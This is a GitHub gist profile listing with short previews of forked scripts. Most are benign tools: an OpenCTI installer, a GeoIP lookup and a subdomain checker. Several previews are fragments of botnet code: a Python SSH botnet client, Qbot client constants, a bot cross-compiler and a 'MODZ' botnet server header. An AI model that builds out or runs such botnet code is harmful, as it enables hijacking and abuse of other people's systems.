Skip to content

Instantly share code, notes, and snippets.

View reanimat0r's full-sized avatar

Bart Black reanimat0r

View GitHub Profile
@reanimat0r
reanimat0r / PySSHBotnet
Created June 19, 2020 21:08 — forked from THEMVFFINMAN/PySSHBotnet
A not real Py SSH Botnet
import argparse, pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
@reanimat0r
reanimat0r / pysshbotnet.py
Created June 19, 2020 21:06 — forked from Belgium/pysshbotnet.py
[Python] Basic SSH Botnet
import pxssh
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
@reanimat0r
reanimat0r / dm.sh
Created June 19, 2020 21:02 — forked from Techkatz/dm.sh
Ever wanted to impress your friends and make them think you're a 'hacker'? Well if so, this script is perfect for you!
#!/bin/bash
#|-------------------------------------------------|
#|Before running this script you must have: |
#| figlet -> apt-get install figlet |
#| cowsay -> apt-get install cowsay |
#| toilet -> apt-get install toilet |
#|-------------------------------------------------|
#REMEBER TO ENTER THS TO MAKE THE FIILE EXACUTABLE 'chmod u+x dm.sh'
@reanimat0r
reanimat0r / client.c
Created June 19, 2020 20:52 — forked from chaztaz11/client.c
Qbot Files
#define PR_SET_NAME 15
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12
#define CMD_IAC 255
#define CMD_WILL 251
#define CMD_WONT 252
#define CMD_DO 253
#define CMD_DONT 254
@reanimat0r
reanimat0r / cc7.py
Created June 19, 2020 20:41 — forked from chaztaz11/cc7.py
file
#Python auto cross compiler by void
import subprocess, sys
if len(sys.argv[2]) != 0:
ip = sys.argv[2]
else:
print("\x1b[0;31mIncorrect Usage!")
print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m")
exit(1)
@reanimat0r
reanimat0r / server.c
Created June 19, 2020 20:31 — forked from chaztaz11/server.c
File
/*
███╗ ███╗ ██████╗ ██████╗ ███████╗
████╗ ████║██╔═══██╗██╔══██╗╚══███╔╝
██╔████╔██║██║ ██║██║ ██║ ███╔╝
██║╚██╔╝██║██║ ██║██║ ██║ ███╔╝
██║ ╚═╝ ██║╚██████╔╝██████╔╝███████╗
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝
If you have this you are trusted. Please do not leak!
MODZ SERVER SIDE V1 By DaddyL33T
# /------------------------------------------\
# | don't forget to download the .tp file |
# | and place it in the user's directory :› |
# | |
# | also install lolcat: |
# | https://github.com/busyloop/lolcat |
# \------------------------------------------/
alias test-passed='if [ "$?" -eq "0" ]; then lolcat ~/.tp -a -s 40 -d 2; fi;'
@reanimat0r
reanimat0r / 0_opencti_ubuntu_installer.sh
Created May 17, 2020 17:08 — forked from p-rs/0_ubuntu_opencti_installer.sh
Automates install OpenCTI based on manual deployment: https://opencti-platform.github.io/docs/installation/manual - Tested successfully on Ubuntu 18.04
#! /bin/bash -e
# script: opencti_ubuntu_installer.sh
# purpose: to automate install opencti based on manual deployment below
# process: https://opencti-platform.github.io/docs/installation/manual
# license: Apache 2.0
# check root -------------------------------------------------------
@reanimat0r
reanimat0r / geoip2lookup.bash
Created May 10, 2020 09:51 — forked from bmatthewshea/geoip2lookup.bash
BASH GeoIP Lookup script for use with new Maxmind MMDB database files
#!/bin/bash
#
# By: Brady Shea - 10FEB2020
#
# Usage (ip4 only):
# geoip2lookup IP_ADDRESS
#
# ** Install GeoIP Tool and Updater **
#
# sudo add-apt-repository ppa:maxmind/ppa
@reanimat0r
reanimat0r / AbirDomains.py
Created April 23, 2020 21:21 — forked from ChananelCode/AbirDomains.py
Small very light-weight Subdomains checker .
# This code was written by Chananel Gerstensang.Contact: [email protected],
# Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157
# Github: https://github.com/ChananelCode
# Enjoy!
import requests
counter_Domains = 0
Domains_List = open("./DomainsList.txt", "r").read().split()